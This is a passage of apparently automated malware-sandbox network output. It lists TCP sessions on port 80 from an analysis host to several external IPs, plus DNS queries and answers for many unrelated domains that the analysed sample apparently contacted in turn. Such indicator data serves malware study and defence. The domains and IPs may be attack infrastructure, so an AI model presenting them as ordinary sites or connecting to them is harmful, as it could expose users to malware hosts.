                                              Jul 21, 2024 13:33:14.300044060 CEST4973580192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:14.303020000 CEST4973580192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:14.310777903 CEST804973513.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:14.769989014 CEST804973513.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:14.770047903 CEST4973580192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:15.819684029 CEST4973580192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:15.824841976 CEST804973513.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:16.844818115 CEST4973680192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:16.849872112 CEST804973613.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:16.849946976 CEST4973680192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:16.852766991 CEST4973680192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:16.857779980 CEST804973613.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:16.857799053 CEST804973613.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:17.329452038 CEST804973613.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:17.331774950 CEST4973680192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:18.364317894 CEST4973680192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:18.370558977 CEST804973613.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:19.385665894 CEST4973780192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:19.390887022 CEST804973713.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:19.393811941 CEST4973780192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:19.395808935 CEST4973780192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:19.402050018 CEST804973713.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:19.875340939 CEST804973713.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:19.875556946 CEST804973713.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:19.877840042 CEST4973780192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:19.881659031 CEST4973780192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:19.888077974 CEST804973713.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:25.247976065 CEST4973880192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:25.253447056 CEST8049738148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:25.256618023 CEST4973880192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:25.259702921 CEST4973880192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:25.264661074 CEST8049738148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:25.839411974 CEST8049738148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:25.839447975 CEST8049738148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:25.839596987 CEST4973880192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:26.770711899 CEST4973880192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:27.789741039 CEST4973980192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:27.794945955 CEST8049739148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:27.795124054 CEST4973980192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:27.797679901 CEST4973980192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:27.806674957 CEST8049739148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:28.376972914 CEST8049739148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:28.377017021 CEST8049739148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:28.377077103 CEST4973980192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:29.301806927 CEST4973980192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:30.321650982 CEST4974080192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:30.326850891 CEST8049740148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:30.326926947 CEST4974080192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:30.329560041 CEST4974080192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:30.335411072 CEST8049740148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:30.335844040 CEST8049740148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:30.907619953 CEST8049740148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:30.957987070 CEST4974080192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:30.970911980 CEST8049740148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:30.970977068 CEST4974080192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:31.833048105 CEST4974080192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:32.852381945 CEST4974180192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:32.857469082 CEST8049741148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:32.857542992 CEST4974180192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:32.859684944 CEST4974180192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:32.864595890 CEST8049741148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:33.452344894 CEST8049741148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:33.452486992 CEST8049741148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:33.452707052 CEST4974180192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:33.457695961 CEST4974180192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:33.462591887 CEST8049741148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:38.573777914 CEST4974280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:38.578938961 CEST80497423.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:38.579030037 CEST4974280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:38.620356083 CEST4974280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:38.626584053 CEST80497423.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:39.035942078 CEST80497423.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:39.035999060 CEST4974280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:40.133742094 CEST4974280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:40.342889071 CEST80497423.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:41.148580074 CEST4974380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:41.153721094 CEST80497433.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:41.153810978 CEST4974380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:41.155921936 CEST4974380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:41.162103891 CEST80497433.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:41.622107983 CEST80497433.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:41.622206926 CEST4974380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:42.661323071 CEST4974380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:42.666537046 CEST80497433.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:43.681679010 CEST4974480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:43.686969995 CEST80497443.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:43.687130928 CEST4974480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:43.689687014 CEST4974480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:43.696441889 CEST80497443.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:43.697105885 CEST80497443.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:44.168028116 CEST80497443.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:44.168092012 CEST4974480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:45.195862055 CEST4974480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:45.201056957 CEST80497443.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:46.211944103 CEST4974580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:46.217015982 CEST80497453.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:46.217087030 CEST4974580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:46.219213963 CEST4974580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:46.224241018 CEST80497453.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:46.713113070 CEST80497453.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:46.714061975 CEST80497453.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:46.714144945 CEST4974580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:46.716202974 CEST4974580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:46.721709013 CEST80497453.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:51.793781996 CEST4974680192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:51.799824953 CEST80497463.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:51.801956892 CEST4974680192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:51.806200027 CEST4974680192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:51.811088085 CEST80497463.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:52.269068956 CEST80497463.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:52.269179106 CEST4974680192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:53.317495108 CEST4974680192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:53.324559927 CEST80497463.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:54.340904951 CEST4974780192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:54.345868111 CEST80497473.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:54.345952034 CEST4974780192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:54.348809958 CEST4974780192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:54.353729010 CEST80497473.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:54.823460102 CEST80497473.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:54.823522091 CEST4974780192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:55.864392996 CEST4974780192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:55.869822025 CEST80497473.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:57.048388958 CEST4974880192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:57.143119097 CEST80497483.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:57.143825054 CEST4974880192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:57.177315950 CEST4974880192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:57.182516098 CEST80497483.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:57.182558060 CEST80497483.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:57.640460014 CEST80497483.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:57.640564919 CEST4974880192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:58.696067095 CEST4974880192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:58.701960087 CEST80497483.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:59.805212021 CEST4974980192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:59.811925888 CEST80497493.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:59.812052965 CEST4974980192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:59.851136923 CEST4974980192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:59.856188059 CEST80497493.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:00.273647070 CEST80497493.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:00.273670912 CEST80497493.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:00.273874998 CEST4974980192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:00.278765917 CEST4974980192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:00.283608913 CEST80497493.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:22.737692118 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:22.743390083 CEST804975084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:22.743470907 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:22.745959997 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:22.751050949 CEST804975084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:23.462435961 CEST804975084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:23.462511063 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:23.464427948 CEST804975084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:23.465745926 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:23.688779116 CEST804975084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:23.688864946 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:24.255106926 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:24.260060072 CEST804975084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:25.273562908 CEST4975180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:25.279180050 CEST804975184.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:25.281816959 CEST4975180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:25.285720110 CEST4975180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:25.290709972 CEST804975184.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:25.767788887 CEST804975184.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:25.769793987 CEST4975180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:26.786590099 CEST4975180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:26.791783094 CEST804975184.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:27.805179119 CEST4975280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:27.810173035 CEST804975284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:27.813821077 CEST4975280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:27.816030025 CEST4975280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:27.820879936 CEST804975284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:27.820986986 CEST804975284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:28.308729887 CEST804975284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:28.308829069 CEST4975280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:30.692651987 CEST4975280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:30.810031891 CEST804975284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:31.711541891 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:31.718132973 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:31.718240023 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:31.720243931 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:31.725936890 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.187755108 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.187872887 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188050032 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:32.188110113 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188184977 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188218117 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188234091 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188251019 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188268900 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188291073 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:32.188374043 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:32.188410044 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188915968 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.189819098 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:32.193159103 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:32.198060989 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:37.235779047 CEST4975480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:37.241127968 CEST80497543.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:37.241337061 CEST4975480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:37.243309021 CEST4975480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:37.248372078 CEST80497543.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:37.716063023 CEST80497543.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:37.716135025 CEST4975480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:38.756321907 CEST4975480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:38.761738062 CEST80497543.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:39.773868084 CEST4975580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:39.780942917 CEST80497553.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:39.781039953 CEST4975580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:39.783036947 CEST4975580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:39.787950993 CEST80497553.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:40.241102934 CEST80497553.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:40.241250992 CEST4975580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:41.286506891 CEST4975580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:41.291918993 CEST80497553.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:42.305948019 CEST4975680192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:42.311034918 CEST80497563.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:42.311299086 CEST4975680192.168.2.73.33.130.190

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 21, 2024 13:31:04.937668085 CEST5102653192.168.2.71.1.1.1
                                              Jul 21, 2024 13:31:04.948348999 CEST53510261.1.1.1192.168.2.7
                                              Jul 21, 2024 13:31:09.962385893 CEST4977253192.168.2.71.1.1.1
                                              Jul 21, 2024 13:31:10.000205994 CEST53497721.1.1.1192.168.2.7
                                              Jul 21, 2024 13:31:30.570785046 CEST5942253192.168.2.71.1.1.1
                                              Jul 21, 2024 13:31:30.608046055 CEST53594221.1.1.1192.168.2.7
                                              Jul 21, 2024 13:31:44.821547985 CEST5535953192.168.2.71.1.1.1
                                              Jul 21, 2024 13:31:44.838875055 CEST53553591.1.1.1192.168.2.7
                                              Jul 21, 2024 13:31:58.217155933 CEST5431853192.168.2.71.1.1.1
                                              Jul 21, 2024 13:31:58.263907909 CEST53543181.1.1.1192.168.2.7
                                              Jul 21, 2024 13:32:12.133591890 CEST5065653192.168.2.71.1.1.1
                                              Jul 21, 2024 13:32:12.319546938 CEST53506561.1.1.1192.168.2.7
                                              Jul 21, 2024 13:32:31.820980072 CEST5970853192.168.2.71.1.1.1
                                              Jul 21, 2024 13:32:31.836699009 CEST53597081.1.1.1192.168.2.7
                                              Jul 21, 2024 13:32:44.977571011 CEST5369853192.168.2.71.1.1.1
                                              Jul 21, 2024 13:32:45.296749115 CEST53536981.1.1.1192.168.2.7
                                              Jul 21, 2024 13:32:58.513370991 CEST5753053192.168.2.71.1.1.1
                                              Jul 21, 2024 13:32:58.600404978 CEST53575301.1.1.1192.168.2.7
                                              Jul 21, 2024 13:33:11.695928097 CEST6118453192.168.2.71.1.1.1
                                              Jul 21, 2024 13:33:11.733429909 CEST53611841.1.1.1192.168.2.7
                                              Jul 21, 2024 13:33:24.900346994 CEST4922553192.168.2.71.1.1.1
                                              Jul 21, 2024 13:33:25.242173910 CEST53492251.1.1.1192.168.2.7
                                              Jul 21, 2024 13:33:38.550190926 CEST5857053192.168.2.71.1.1.1
                                              Jul 21, 2024 13:33:38.564378977 CEST53585701.1.1.1192.168.2.7
                                              Jul 21, 2024 13:33:51.728717089 CEST5311153192.168.2.71.1.1.1
                                              Jul 21, 2024 13:33:51.789525032 CEST53531111.1.1.1192.168.2.7
                                              Jul 21, 2024 13:34:05.291845083 CEST5750453192.168.2.71.1.1.1
                                              Jul 21, 2024 13:34:05.300380945 CEST53575041.1.1.1192.168.2.7
                                              Jul 21, 2024 13:34:11.866059065 CEST5083253192.168.2.71.1.1.1
                                              Jul 21, 2024 13:34:12.086209059 CEST53508321.1.1.1192.168.2.7
                                              Jul 21, 2024 13:34:22.681647062 CEST6335253192.168.2.71.1.1.1
                                              Jul 21, 2024 13:34:22.734564066 CEST53633521.1.1.1192.168.2.7
                                              Jul 21, 2024 13:34:37.212033033 CEST5865253192.168.2.71.1.1.1
                                              Jul 21, 2024 13:34:37.232394934 CEST53586521.1.1.1192.168.2.7

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jul 21, 2024 13:31:04.937668085 CEST192.168.2.71.1.1.10x40faStandard query (0)www.marktuana.comA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:31:09.962385893 CEST192.168.2.71.1.1.10x7ec3Standard query (0)www.italyuntold.comA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:31:30.570785046 CEST192.168.2.71.1.1.10xae84Standard query (0)www.funnelkakes.comA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:31:44.821547985 CEST192.168.2.71.1.1.10x9740Standard query (0)www.shiybalinks.comA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:31:58.217155933 CEST192.168.2.71.1.1.10xbba7Standard query (0)www.olhadeputat.comA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:32:12.133591890 CEST192.168.2.71.1.1.10x65c9Standard query (0)www.jleabres.comA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:32:31.820980072 CEST192.168.2.71.1.1.10x15b6Standard query (0)www.evoolihubs.shopA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:32:44.977571011 CEST192.168.2.71.1.1.10xdf17Standard query (0)www.fardehb.topA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:32:58.513370991 CEST192.168.2.71.1.1.10x3110Standard query (0)www.sehraji.comA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:33:11.695928097 CEST192.168.2.71.1.1.10x56b9Standard query (0)www.ecoaxion.comA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:33:24.900346994 CEST192.168.2.71.1.1.10xb308Standard query (0)www.809934.comA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:33:38.550190926 CEST192.168.2.71.1.1.10xb6eStandard query (0)www.betano627.comA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:33:51.728717089 CEST192.168.2.71.1.1.10xd6bStandard query (0)www.nationsincbook.comA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:34:05.291845083 CEST192.168.2.71.1.1.10x367Standard query (0)wwwA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:34:11.866059065 CEST192.168.2.71.1.1.10x991dStandard query (0)wwwA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:34:22.681647062 CEST192.168.2.71.1.1.10x14cdStandard query (0)www.karak-networks.onlineA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:34:37.212033033 CEST192.168.2.71.1.1.10xcf97Standard query (0)www.gtprivatewealth.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jul 21, 2024 13:31:04.948348999 CEST1.1.1.1192.168.2.70x40faName error (3)www.marktuana.comnonenoneA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:31:10.000205994 CEST1.1.1.1192.168.2.70x7ec3No error (0)www.italyuntold.comitalyuntold.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 21, 2024 13:31:10.000205994 CEST1.1.1.1192.168.2.70x7ec3No error (0)italyuntold.com3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:31:10.000205994 CEST1.1.1.1192.168.2.70x7ec3No error (0)italyuntold.com15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:31:30.608046055 CEST1.1.1.1192.168.2.70xae84No error (0)www.funnelkakes.comfunnelkakes.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 21, 2024 13:31:30.608046055 CEST1.1.1.1192.168.2.70xae84No error (0)funnelkakes.com76.223.67.189A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:31:30.608046055 CEST1.1.1.1192.168.2.70xae84No error (0)funnelkakes.com13.248.213.45A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:31:44.838875055 CEST1.1.1.1192.168.2.70x9740No error (0)www.shiybalinks.comshiybalinks.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 21, 2024 13:31:44.838875055 CEST1.1.1.1192.168.2.70x9740No error (0)shiybalinks.com3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:31:44.838875055 CEST1.1.1.1192.168.2.70x9740No error (0)shiybalinks.com15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:31:58.263907909 CEST1.1.1.1192.168.2.70xbba7No error (0)www.olhadeputat.com188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:31:58.263907909 CEST1.1.1.1192.168.2.70xbba7No error (0)www.olhadeputat.com188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:32:12.319546938 CEST1.1.1.1192.168.2.70x65c9No error (0)www.jleabres.com103.168.172.37A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:32:12.319546938 CEST1.1.1.1192.168.2.70x65c9No error (0)www.jleabres.com103.168.172.52A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:32:31.836699009 CEST1.1.1.1192.168.2.70x15b6No error (0)www.evoolihubs.shop188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:32:31.836699009 CEST1.1.1.1192.168.2.70x15b6No error (0)www.evoolihubs.shop188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:32:45.296749115 CEST1.1.1.1192.168.2.70xdf17No error (0)www.fardehb.top203.161.41.207A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:32:58.600404978 CEST1.1.1.1192.168.2.70x3110No error (0)www.sehraji.comsehraji.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 21, 2024 13:32:58.600404978 CEST1.1.1.1192.168.2.70x3110No error (0)sehraji.com84.32.84.32A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:33:11.733429909 CEST1.1.1.1192.168.2.70x56b9No error (0)www.ecoaxion.com13.248.169.48A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:33:11.733429909 CEST1.1.1.1192.168.2.70x56b9No error (0)www.ecoaxion.com76.223.54.146A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:33:25.242173910 CEST1.1.1.1192.168.2.70xb308No error (0)www.809934.com148.135.97.125A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:33:38.564378977 CEST1.1.1.1192.168.2.70xb6eNo error (0)www.betano627.combetano627.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 21, 2024 13:33:38.564378977 CEST1.1.1.1192.168.2.70xb6eNo error (0)betano627.com3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:33:38.564378977 CEST1.1.1.1192.168.2.70xb6eNo error (0)betano627.com15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:33:51.789525032 CEST1.1.1.1192.168.2.70xd6bNo error (0)www.nationsincbook.comnationsincbook.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 21, 2024 13:33:51.789525032 CEST1.1.1.1192.168.2.70xd6bNo error (0)nationsincbook.com3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:33:51.789525032 CEST1.1.1.1192.168.2.70xd6bNo error (0)nationsincbook.com15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:34:05.300380945 CEST1.1.1.1192.168.2.70x367Name error (3)wwwnonenoneA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:34:12.086209059 CEST1.1.1.1192.168.2.70x991dName error (3)wwwnonenoneA (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:34:22.734564066 CEST1.1.1.1192.168.2.70x14cdNo error (0)www.karak-networks.onlinekarak-networks.onlineCNAME (Canonical name)IN (0x0001)false
                                              Jul 21, 2024 13:34:22.734564066 CEST1.1.1.1192.168.2.70x14cdNo error (0)karak-networks.online84.32.84.32A (IP address)IN (0x0001)false
                                              Jul 21, 2024 13:34:37.232394934 CEST1.1.1.1192.168.2.70xcf97No error (0)www.gtprivatewealth.comgtprivatewealth.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 21, 2024 13:34:37.232394934 CEST1.1.1.1192.168.2.70xcf97No error (0)gtprivatewealth.com3.33.130.190A (IP address)IN (0x0001)false
